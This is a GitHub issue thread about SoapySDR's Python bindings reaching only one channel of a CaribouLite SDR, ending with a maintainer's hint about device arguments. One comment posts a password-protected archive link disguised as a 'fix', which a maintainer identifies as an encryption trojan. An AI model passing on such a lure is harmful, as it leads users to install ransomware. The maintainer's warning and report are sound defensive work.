pothosware/SoapySDR #440: SoapySDR Python only connects to channel 0.

jberwald, 2024-08-26:
Hello, 

Thanks for the great SoapySDR library. 

I'm having an issue when connecting to Cariboulite SDR using SoapySDR. I'm pretty sure the issue is contained within SoapySDR's Python interface: I can see both of Cariboulite's channels (S1G and HiF) and use them both from SDR++ and CubicSDR. But when writing Python scripts, I am limited to using only the S1G channel. For instance, `getAntenna` only ever returns the S1G channel. Here is an example:

```python
import SoapySDR        # main package
from SoapySDR import * # constants
import numpy           # buffers
import sys             # exit on error
import pprint          # pretty printer

mydriver    = "Cariboulite"      # Ref: "SoapySDRUtil --find"
mydirection = SOAPY_SDR_RX  # Interested in receiver info
mychannel   = 0             #  or 1 
stream_format = SOAPY_SDR_CS16

pp = pprint.PrettyPrinter()

print('\nDevices:')
devices = SoapySDR.Device.enumerate()
for result in devices: 
    pp.pprint(dict(result))
``` 
The above code returns the expected channels, so I know that SoapySDR can see them:
```bash
{'channel': 'S1G',
 'device_id': '0',
 'driver': 'Cariboulite',
 'label': 'CaribouLite S1G[28fc7a78]',
 'name': 'CaribouLite RPI Hat',
 'serial': '28fc7a78',
 'uuid': 'c8c3d8e6-f596-462b-a92b-d9678ec92d38',
 'vendor': 'CaribouLabs LTD',
 'version': '0x0001'}

{'channel': 'HiF',
 'device_id': '1',
 'driver': 'Cariboulite',
 'label': 'CaribouLite HiF[28fc7a79]',
 'name': 'CaribouLite RPI Hat',
 'serial': '28fc7a79',
 'uuid': 'c8c3d8e6-f596-462b-a92b-d9678ec92d38',
 'vendor': 'CaribouLabs LTD',
 'version': '0x0001'}
```
Unfortunately, when I call `getAntenna` to start trying to collect a signal I am only able to get the S1G channel:
```python
print('\nAntennas:')
for channel in range(len(devices)):
    ants = sdr.listAntennas(mydirection, channel)

    for result in ants: pp.pprint(result)

# activate the antenna
print('\nANT:')
ant = sdr.getAntenna(mydirection, 1)
print(ant)

print('\nSetup Stream:')
rxStream = sdr.setupStream(SOAPY_SDR_RX, stream_format)
print('\nActivate Stream:')
sdr.activateStream(rxStream) #start streaming
```
gives
```
Antennas:
'TX/RX Sub1GHz'
'TX/RX Sub1GHz'

ANT:
TX/RX Sub1GHz

Setup Stream:

Activate Stream:

[ERROR] SoapySDR::Device::enumerate(sdrplay) sdrplay_api_Open() failed
[INFO] setupStream: dir= RX, format= CS16
```
I'm pretty sure the `sdrplay` error isn't an issue here. As mentioned above, I know that through SDR++ and CubicSDR running with SoapySDR I can access the HiF antenna. 

Any hints as to how I can access the channel listed as `device_id: 1`? 
Thanks for any help.

youngerwarrior, 2024-08-26:
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

zuckschwerdt, 2024-08-26:
Do not download, unpack or run that rar archive, **it is malware**.
Multiple engines report an encryption trojan. See https://www.virustotal.com/gui/file/3962b839a75c06c014c975bd857c723e126e81f546c0c2e54182272820b5cbb5

zuckschwerdt, 2024-08-26:
If possible confirm this by submitting the contained file `x86_64-w64-ranlib.exe` to some malware scanners, then report the user for malware activity.

jberwald, 2024-08-26:
No worries, not touching that malware. Thanks @zuckschwerdt .

zuckschwerdt, 2024-08-26:
GitHub was fast to react and the file hosting site also took that upload down.

Regarding your python api worries I can't really help, I've never used the python bindings and I don't have multi-channel capable hardware. But looking at the source https://github.com/cariboulabs/cariboulite/blob/main/software/libcariboulite/src/soapy_api/Cariboulite.cpp#L86 I notice that the channel arg is disregarded, the cariboulite_radio_state_st radio type is used. This type is setup with the channel info from device creation https://github.com/cariboulabs/cariboulite/blob/main/software/libcariboulite/src/soapy_api/Cariboulite.cpp#L17
Maybe something to check.

zuckschwerdt, 2024-08-26:
I.e. I guess you need different `sdr = SoapySDR.Device(args)` with channel already set in those `args`.